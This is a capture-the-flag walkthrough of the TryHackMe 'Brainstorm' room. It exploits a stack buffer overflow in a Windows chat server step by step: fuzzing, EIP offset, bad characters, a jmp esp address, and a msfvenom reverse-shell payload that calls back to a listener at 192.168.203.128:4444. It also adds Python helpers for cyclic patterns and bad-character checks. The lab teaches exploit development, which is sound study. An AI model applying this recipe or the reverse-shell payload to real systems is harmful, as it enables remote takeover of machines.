TryHackMe — Brainstorm

Reverse engineer a chat program and write a script to exploit a Windows machine.

NMAP Scan:

nmap -sC -sV -Pn -T4 10.10.175.210 --disable-arp -oX chatserver_nmap.xml

  • sC = default script scan
  • sV = version scan
  • Pn = skip host discovery (treat the host as online)
  • T4 = aggressive timing

The first step is to grab chatserver.exe and essfunc.dll from the target machine over FTP and copy them to your local machine for debugging.

Open Immunity Debugger as Administrator on your local machine, attach chatserver.exe, and hit F9 to run the program.

Check how the application behaves using netcat. The vulnerable part of this application is the “Write a message:” prompt.

A simple Python script that sends a bunch of As to the application:

This script sends 2500 As and checks whether the chatserver crashes.

Run the Python script:

We successfully crashed the application and overwrote EIP:

Find the exact EIP offset using msf-pattern_create -l 2500.

  • l = length of the pattern

Copy the output and replace the 2500 As in the Python script with it.

Go back to Immunity Debugger, hit F12 to restart, then hit F9 again to run chatserver.exe.

Execute the Python script again, then check Immunity. Once again we have crashed the application, but this time take note of the EIP value.

Locate the exact offset of EIP using !mona or msf-pattern_offset:

Using mona:

Using msf:

Edit the Python script and change the pattern back to a bunch of As, but now multiplied by 2012, the EIP offset we just found, followed by 4 Bs. Running this script should overwrite EIP with the 4 Bs, i.e. 42424242.
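The offset step above relies on two ideas that the screenshots cannot show: the msf pattern is built so that every 4-byte window is unique, and the debugger displays EIP as a 32-bit integer read from a little-endian stack, so the hex digits on screen are the reverse of the bytes in memory. The following is an added example written for this walkthrough, not the post's own script and not Metasploit or mona code; it reimplements msf-pattern_create / msf-pattern_offset in plain Python and also does the little-endian packing that the post later performs by hand for the jmp esp address (625014DF).

```python
import string
import struct

# Added example (not the post's script): a Metasploit-style cyclic pattern
# (Aa0Aa1Aa2...), an offset finder that takes the EIP value as the debugger
# shows it, and the little-endian packing used for a return address.

MAX_PATTERN = 26 * 26 * 10 * 3  # bytes before the "Xy9" triples would repeat


def cyclic_pattern(length: int) -> bytes:
    """First `length` bytes of the Aa0Aa1... pattern (msf-pattern_create -l)."""
    if length > MAX_PATTERN:
        raise ValueError(f"patterns longer than {MAX_PATTERN} bytes are not unique")
    triples = (
        up + low + dig
        for up in string.ascii_uppercase
        for low in string.ascii_lowercase
        for dig in string.digits
    )
    out = bytearray()
    for triple in triples:
        out += triple.encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pack_address(hex_value: str) -> bytes:
    """Pack a 32-bit value as the little-endian bytes that sit on the stack.

    625014DF -> b'\\xdf\\x14\\x50\\x62', the same conversion the post does by hand.
    """
    return struct.pack("<I", int(hex_value, 16))


def find_offset(pattern: bytes, eip_hex: str) -> int:
    """Offset of the crashed EIP value inside the pattern, or -1 if absent
    (msf-pattern_offset -q <value>). EIP is shown as an integer loaded from a
    little-endian stack, so the bytes in memory are the reverse of the hex
    digits on screen; pack_address() reverses them back for the search."""
    return pattern.find(pack_address(eip_hex))


if __name__ == "__main__":
    pattern = cyclic_pattern(2500)
    # Simulate the crash: the four pattern bytes at offset 2012 land in EIP,
    # and Immunity shows them as an integer (bytes reversed).
    eip_as_shown = pattern[2012:2016][::-1].hex().upper()
    print("EIP shown in debugger:", eip_as_shown)
    print("offset:", find_offset(pattern, eip_as_shown))
    print("jmp esp address packed:", pack_address("625014DF"))
```

Because `find_offset` returns -1 for a value that is not in the pattern (42424242 after the As-plus-Bs run, for example), a negative result is a quick sanity check that the register really holds pattern bytes and not some other part of the crashed state.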

Once again, restart chatserver.exe in Immunity Debugger, then execute the Python script.

Now that we have confirmed that we control EIP, let’s check for bad characters.

Generate a bytearray in Immunity Debugger using mona. First set the working folder:


!mona config -set workingfolder c:\mona\%p

!mona bytearray -b "\x00"

Edit the Python script to add the bytearray (you can search for the full list of bytes on Google); just don’t forget to remove the “\x00”.

Restart Immunity Debugger and run chatserver.exe, then run the Python script. Once again, the application crashes. Let’s compare the bytearray file with the memory at our ESP address:

!mona compare -f C:\mona\chatserver\bytearray.bin -a 018DEEC0
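What `!mona compare` does is a byte-for-byte comparison of the array that was sent against what actually landed at ESP, and the important caveat is that only the first mismatch is reliable: once one byte is dropped, rewritten or terminates the read, every byte after it is shifted, so the right procedure is to exclude that one byte, regenerate the array and compare again. The following is an added example written for this walkthrough, not mona's code and not the post's script; the `fake_target` function is a constructed stand-in for the crashed process that drops \x0d and stops at \x0a, which is purely illustrative and says nothing about which bytes chatserver.exe actually mangles.

```python
# Added example (not the post's script, not mona): a minimal stand-in for
# "!mona bytearray -b" plus "!mona compare", with the exclude-and-repeat loop.


def bytearray_without(excluded) -> bytes:
    """Bytes 0x00..0xff minus the ones already known to be bad (mona bytearray -b)."""
    return bytes(b for b in range(256) if b not in excluded)


def fake_target(sent: bytes) -> bytes:
    """CONSTRUCTED stand-in for reading the stack at ESP after the crash.

    This toy drops every \\x0d and stops reading at the first \\x0a, so that the
    loop below has something to find. It is not a claim about chatserver.exe;
    in the real workflow the bytes come from the debugger.
    """
    kept = sent.replace(b"\x0d", b"")
    newline = kept.find(b"\x0a")
    return kept if newline == -1 else kept[:newline]


def first_mismatch(sent: bytes, in_memory: bytes):
    """(index, sent byte) of the first byte that did not survive, or None.

    A shorter in_memory counts as a mismatch at the truncation point, which is
    how a byte that terminates the read (a newline for a line-based reader) shows up.
    """
    for i, b in enumerate(sent):
        if i >= len(in_memory) or in_memory[i] != b:
            return i, b
    return None


def find_bad_chars(read_memory, excluded=(0x00,)) -> list:
    """Send / compare / exclude until the whole array survives unchanged.

    read_memory(sent) must return the bytes found at ESP for that send; in the
    walkthrough that is the manual cycle of restarting the program, running the
    script and calling !mona compare. Returns the sorted list of bad bytes.
    """
    bad = set(excluded)
    while True:
        arr = bytearray_without(bad)
        hit = first_mismatch(arr, read_memory(arr))
        if hit is None:
            return sorted(bad)
        bad.add(hit[1])  # trust only the first mismatch, then re-run


if __name__ == "__main__":
    print("bad chars:", [f"\\x{b:02x}" for b in find_bad_chars(fake_target)])
```

With the constructed target the loop needs three rounds (\x00 excluded up front, then \x0a, then \x0d) before the array comes back intact, which is exactly the pattern of repeated `!mona compare` runs the screenshots would show: one new bad byte per crash, not the whole list at once.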

Let’s now locate a jump point address, excluding pointers that contain the bad character:

!mona jmp -r esp -cpb "\x00"

Copy one jmp esp address, then edit our Python script:

Transform the address to little endian:

625014DF = \xdf\x14\x50\x62

Add a NOP sled before the payload:

"\x90" * 32

Create the msfvenom payload:

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.203.128 LPORT=4444 -f python --var-name buffer EXITFUNC=thread -b "\x00"

Run a netcat listener, then run the script:

nc -lvnp 4444

To exploit the TryHackMe box, you just need to regenerate the payload with the IP address appropriate for the target environment.
